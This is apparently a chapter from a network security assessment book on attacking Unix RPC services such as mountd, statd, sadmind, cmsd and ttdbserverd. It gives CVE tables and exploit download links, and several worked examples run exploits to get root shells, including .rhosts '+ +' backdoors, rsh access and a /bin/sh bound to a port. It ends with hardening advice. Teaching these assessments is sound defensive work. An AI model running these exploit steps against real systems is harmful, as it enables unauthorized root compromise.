Vulnerabilities in Unix RPC services have led to many large organizations falling victim to hackers over the last 10 years. One such incident in April 1999 resulted in the web sites of Playboy, Sprint, O’Reilly Media, Sony Music, Sun Microsystems, and others being mass-defaced by H4G1S and the Yorkshire Posse (HTML mirrored at http://www.2600.com/hackedphiles/current/oreilly/hacked/). In this chapter, I cover remote RPC service vulnerabilities in Solaris, IRIX, and Linux, exploring how these services are exploited in the wild and how you can protect them. In general, these services should not be presented to the public Internet and should be run only when absolutely necessary.
A number of interesting Unix daemons (including NIS+, NFS, and CDE components) run as Remote Procedure Call (RPC) services using dynamically assigned high ports. To keep track of registered endpoints and present clients with accurate details of listening RPC services, a portmapper service listens on TCP and UDP port 111, and sometimes on TCP and UDP port 32771 also.
The RPC portmapper (also known as rpcbind within Solaris) can be queried using
the rpcinfo
command found on most
Unix-based platforms, as shown in Example 13-1.
$ rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
In this example, you can find the following:
status
(rpc.statd) on TCP port 32771 and UDP port
32772
nlockmgr
(rpc.lockd) on TCP and UDP port
4045
nfsd
on UDP port
2049
rquotad
on UDP port
32822
rusersd
on TCP port 33180
and UDP port 32823
These services can be accessed and queried directly using client software, such as showmount and mount (to access nfsd and mountd), and rusers (to access rusersd, covered in Chapter 5).
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack.
You can run Nmap with the -sR
option to identify RPC services listening on high ports if the
portmapper is inaccessible. Example 13-2 shows Nmap in use
against a Solaris 9 host behind a firewall filtering the portmapper
and services below port 1024.
$ nmap -sR 10.0.0.9
Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2007-04-01 20:39 UTC
Interesting ports on 10.0.0.9:
PORT STATE SERVICE VERSION
4045/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
6000/tcp open X11
6112/tcp open dtspc
7100/tcp open font-service
32771/tcp open ttdbserverd (ttdbserverd V1) 1 (rpc #100083)
32772/tcp open kcms_server (kcms_server V1) 1 (rpc #100221)
32773/tcp open metad (metad V1) 1 (rpc #100229)
32774/tcp open metamhd (metamhd V1) 1 (rpc #100230)
32775/tcp open rpc.metamedd (rpc.metamedd V1) 1 (rpc #100242)
32776/tcp open rusersd (rusersd V2-3) 2-3 (rpc #100002)
32777/tcp open status (status V1) 1 (rpc #100024)
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open dmispd (dmispd V1) 1 (rpc #300598)
If network access to the RPC portmapper service is filtered and you try to use an RPC client, such as showmount, it will fail, as shown here:
$ showmount -e 10.0.0.9
mount clntudp_create: RPC: Port mapper failure RPC: Unable to receive
The portmapper is required to orchestrate and manage the connection between the RPC client and service endpoint. To connect to remote RPC endpoints without an available portmapper using standard RPC clients, we must configure a local RPC portmapper and proxy the RPC endpoint connections through to the remote (target) server.
This technique is described by David Routin in his paper at http://www.milw0rm.com/papers/154, and it requires that the following utilities be installed and available on the local RPC attack proxy server:
netcat
inetd
portmap
pmap_set
Due to the number of different RPC services, associated prognum
values, CVE references, and vulnerable
platforms, it is difficult to simply group bugs and talk about them
individually. I have put together the matrix of popular services and
vulnerable platforms shown in Table 13-1. A small number of
obscure IRIX services (rpc.xfsmd,
rpc.espd, etc.) aren’t listed; you
can investigate them through MITRE CVE and other sources.
Program number | Service | CVE references | Exploit framework support | |||
IMPACT | CANVAS | MSF | LSD | |||
100000 | portmapper | CVE-2007-0736 CVE-1999-190 | ||||
100003 | nfsd | CVE-1999-0832 | ||||
100004 | ypserv | CVE-2000-1043 CVE-2000-1042 | ||||
100005 | mountd | CVE-2005-0139 CVE-2003-0252 CVE-1999-0002 | ||||
100007 | ypbind | CVE-2001-1328 CVE-2000-1041 | ✓ | |||
100008 | rwalld | CVE-2002-0573 | ✓ | |||
100009 | yppasswd | CVE-2001-0779 | ✓ | ✓ | ||
100024 | statd | CVE-2000-0666 CVE-1999-0493 CVE-1999-0019 CVE-1999-0018 | ✓ | |||
100028 | ypupdated | CVE-1999-0208 | ||||
100068 | cmsd | CVE-2002-1998 | ||||
CVE-2002-0391 | ✓ | |||||
CVE-1999-0696 | ✓ | |||||
CVE-1999-0320 | ||||||
100083 | ttdbserverd | CVE-2002-0679 CVE-2002-0677 | ||||
CVE-2002-0391 CVE-2001-0717 | ✓ | ✓ | ||||
CVE-1999-0003 | ✓ | ✓ | ||||
100099 | autofsd | CVE-1999-0088 | ||||
100232 | sadmind | CVE-2003-0722 CVE-1999-0977 | ✓ | ✓ | ✓ | |
100235 | cachefsd | CVE-2002-0033 | ✓ | |||
CVE-2002-0084 | ✓ | ✓ | ||||
100249 | snmpXdmid | CVE-2001-0236 | ✓ | ✓ | ✓ | |
100300 | nisd | CVE-1999-0795 CVE-1999-0008 | ||||
150001 | pcnfsd | CVE-1999-0078 | ||||
300019 | amd | CVE-1999-0704 |
Two sets of integer overflows were uncovered in 2002 and 2003 relating to XDR functions used in Solaris RPC services and associated components. These issues are listed in MITRE CVE as CVE-2003-0028 and CVE-2002-0391, and have multiple attack vectors, including .cmsd, ttdbserverd, and dmispd.
The LSD column in Table 13-1 does not relate to an exploitation framework, but the work of the Last Stage of Delirium (LSD) research team. LSD published reliable standalone exploits for the issues marked in Table 13-1, which are available in ZIP archives (solaris.zip and irix.zip) that are available from http://lsd-pl.net/code/. These ZIP archives are also available from the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/.
Exploits for vulnerabilities that are not covered by CORE IMPACT, Immunity CANVAS, MSF, or LSD are listed in the following sections of this chapter.
Three serious remotely exploitable bugs have been identified in the mountd and nfsd service binaries that are bundled with older Linux distributions (primarily Red Hat and Debian). The MITRE CVE references for these bugs are CVE-2003-0252, CVE-1999-0832, and CVE-1999-0002. Many DoS issues exist in recent NFS implementations, which you can investigate by checking MITRE CVE (http://cve.mitre.org).
In July 2003, an off-by-one bug was identified in the xlog( )
function of the mountd service bundled with multiple
Linux distributions (including Debian 8.0, Slackware 8.1, and Red
Hat Linux 6.2) as part of the nfs-utils-1.0.3 package. An exploit
script for this issue is available at http://www.newroot.de/projects/mounty.c.
A second remotely exploitable issue was identified in Red Hat Linux 5.2 and Debian 2.1 and earlier relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package) in November 1999. An exploit script for this issue is available at http://examples.oreilly.com/networksa/tools/rpc_nfsd2.c.
In October 1998, a serious remotely exploitable vulnerability was found in the NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package). Other Linux distributions were also found to be vulnerable, along with IRIX. Exploit scripts for this issue are available at:
http://examples.oreilly.com/networksa/tools/ADMmountd.tgz |
http://examples.oreilly.com/networksa/tools/rpc.mountd.c |
If the mountd service is
running, you can use the Unix showmount
command to list exported
directories on the target host. These directories can be accessed
and manipulated by using the mount
command, and other NFS client
utilities. In Example 13-3, I use showmount
to query a Solaris 2.6 host at
10.0.0.6
and by writing a
.rhost file to a user’s home
directory, gain remote access privileges.
$showmount -e 10.0.0.6
Export list for 10.0.0.6: /home (everyone) /usr/local onyx.trustmatta.com /disk0 10.0.0.10,10.0.0.11 $mount 10.0.0.6:/home /mnt
$cd /mnt
$ls -la
total 44 drwxr-x--- 17 root root 512 Jun 26 09:59 . drwxr-xr-x 9 root root 512 Oct 12 03:25 .. drwx------ 4 chris users 512 Sep 20 2002 chris drwxr-x--- 4 david users 512 Mar 12 2003 david drwx------ 3 chuck users 512 Nov 20 2002 chuck drwx--x--x 8 jarvis users 1024 Oct 31 13:15 jarvis $cd jarvis
$echo + + > .rhosts
$cd /
$umount /mnt
$rsh -l jarvis 10.0.0.6 csh -i
Warning: no access to tty; thus no job control in this shell... dockmaster%
In recent years, four serious remotely exploitable bugs have been identified in the NFS status service (known as rpc.statd on most Unix-based platforms, and not to be confused with rpc.rstatd). These bugs are listed in Table 13-2, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference(s) | Affected platforms | Exploit scripts |
CVE-2000-0666 | Red Hat 6.2, Mandrake 7.1, and other Linux distributions | lsx.tgz, statdx2.tar.gz, and rpc-statd.c |
CVE-1999-0493 | Solaris 2.5.1 | statd.tar.gz |
CVE-1999-0018 and CVE-1999-0019 | Solaris 2.4, IRIX, AIX, and HP-UX | dropstatd (Solaris binary) |
The Sun Solstice AdminSuite Daemon (sadmind) is enabled by default on Solaris 2.5.1 and later (up to Solaris 9 at the time of writing). sadmind has been found to be remotely vulnerable to two serious issues over recent years; they are known within MITRE CVE as CVE-1999-0977 and CVE-2003-0722.
The sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow. Two exploits are effective at compromising vulnerable Solaris instances on Intel (x86) and SPARC architectures and are available at:
http://examples.oreilly.com/networksa/tools/super-sadmind.c |
http://examples.oreilly.com/networksa/tools/sadmind-brute.c |
A more recent bug, identified in September 2003, relates to
authentication within sadmind.
By default, the sadmind service
runs in a weak security mode known as AUTH_SYS
. When running in this mode,
sadmind accepts command
requests containing the user and group IDs, as well as the
originating system name. Because these values aren’t validated by
the sadmind service, you can
gain access to a vulnerable system by sending a crafted RPC request.
Because this bug doesn’t rely on memory manipulation, it can be
exploited very easily to circumvent proactive mechanisms that may be
in use, such as stack protection.
H D Moore wrote a Perl exploit script called rootdown.pl, available at http://www.metasploit.com/tools/rootdown.pl. This script has been integrated into MSF and can be run from the framework with ease.
Example 13-4 shows
the rootdown.pl script in use
against a Solaris 9 server at 10.0.0.9
. As shown in Example 13-4, you can write
"+ +
" into a user’s .rhosts file (the bin
user this case) to easily gain
access.
$perl rootdown.pl -h 10.0.0.9 -i
sadmind>echo + + > /usr/bin/.rhosts
Success: your command has been executed successfully. sadmind>exit
Exiting interactive mode... $rsh -l bin 10.0.0.9 csh -i
Warning: no access to tty; thus no job control in this shell... onyx%uname -a
SunOS onyx 5.9 Generic_112234-08 i86pc i386 i86pc
In recent years, four serious remotely exploitable bugs have been identified in the CDE Calendar Manager Service Daemon (CMSD), known as rpc.cmsd on most Unix-based platforms. These bugs are listed in Table 13-3, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference | Affected platforms | Exploit scripts |
CVE-2002-1998 | SCO UnixWare 7.1.1 and OpenUnix 8.0.0 | unixware_cmsd.c |
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms | (Immunity CANVAS supports these exploits) |
CVE-1999-0696 | Solaris 2.7, HP-UX 11.00, Tru64 4.0f, and SCO UnixWare 7.1.0 | lsd_cmsd.c and cmsd.tgz |
CVE-1999-0320 | Solaris 2.5.1 and SunOS 4.1.4 | N/A |
Example 13-5 shows the usage of the compiled cmsd exploit (found in cmsd.tgz).
$ ./cmsd
usage: cmsd [-s] [-h hostname] [-c command] [-u port] [-t port]
version host
-s: just start up rpc.cmsd (useful with a firewalled portmapper)
-h: (for 2.6) specifies the hostname of the target
-c: specifies an alternate command
-u: specifies a port for the udp portion of the attack
-t: specifies a port for the tcp portion of the attack
Available versions:
1: Solaris 2.5.1 /usr/dt/bin/rpc.cmsd 338844 [2-5]
2: Solaris 2.5.1 /usr/openwin/bin/rpc.cmsd 200284 [2-4]
3: Solaris 2.5 /usr/openwin/bin/rpc.cmsd 271892 [2-4]
4: Solaris 2.6 /usr/dt/bin/rpc.cmsd 347712 [2-5]
5: Solaris 7 /usr/dt/bin/rpc.cmsd
6: Solaris 7 /usr/dt/bin/rpc.cmsd (2)
7: Solaris 7 (x86) .../dt/bin/rpc.cmsd 329080 [2-5]
8: Solaris 2.6_x86 .../dt/bin/rpc.cmsd 318008 [2-5]
For the exploit to work, you must build an RPC request that includes the local hostname (also known as the RPC cache name) of the target server. Under Solaris, there are a number of services that give away the hostname, including FTP, as shown here:
$ ftp 10.0.0.6
Connected to 10.0.0.6.
220 dockmaster FTP server (SunOS 5.6) ready.
Name (10.0.0.6:root):
After obtaining both the hostname and version of Solaris running on the target host, you can launch the cmsd exploit. If no command is specified, the tool binds /bin/sh to TCP port 1524, as shown in Example 13-6.
$./cmsd -h dockmaster 4 10.0.0.6
rtable_create worked clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection reset by peer $telnet 10.0.0.6 1524
Trying 10.0.0.6... Connected to 10.0.0.6. Escape character is '^]'.id;
uid=0(root) gid=0(root)
In recent years, four serious remotely exploitable bugs have been identified in the ToolTalk Database (TTDB) service, known as rpc.ttdbserverd on most Unix-based platforms. These bugs are listed in Table 13-4, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.
CVE reference | Affected platforms | Exploit scripts |
CVE-2002-0679 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0 | N/A |
CVE-2002-0677 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0 | N/A |
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms | (Immunity CANVAS and CORE IMPACT support these exploits) |
CVE-2001-0717 | Solaris 8, HP-UX 11.11, Tru64 5.1A, AIX 5.1, and IRIX 6.4 | N/A |
CVE-1999-0003 | Solaris 2.6, HP-UX 11.0, and IRIX 6.5.2 | lsd_irix_ttdb.c and lsd_sol_ttdb.c |
Example 13-7 shows
the LSD TTDB exploit in use against a Solaris 2.6 host at 10.0.0.6
.
$./lsd_sol_ttdb
copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/ rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc usage: ./lsd_solttdb address [-s|-c command] [-p port] [-v 6] $./lsd_sol_ttdb 10.0.0.6 -v 6
copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/ rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc adr=0xeffffaf8 timeout=10 port=32785 connected! sent! SunOS dockmaster 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10id
uid=0(root) gid=0(root)
The following countermeasures should be considered when hardening RPC services:
Don’t run rexd, rusersd, or rwalld RPC services because they are of minimal use and provide attackers with both useful information and direct access to your hosts.
In high-security environments, don’t offer any RPC services to the public Internet. Due to the complexity of these services, it is highly likely that zero-day exploit scripts will be available to attackers. RPC services should be filtered and disabled wherever possible, and should only be run where absolutely necessary.
To minimize the risk of internal or trusted attacks against necessary RPC services (such as NFS components, including statd, lockd, and mountd), install the latest vendor security patches.
Aggressively filter egress traffic, where possible, to ensure that even if an attack against an RPC service is successful, a connect-back shell can’t be spawned to the attacker.
3.21.247.16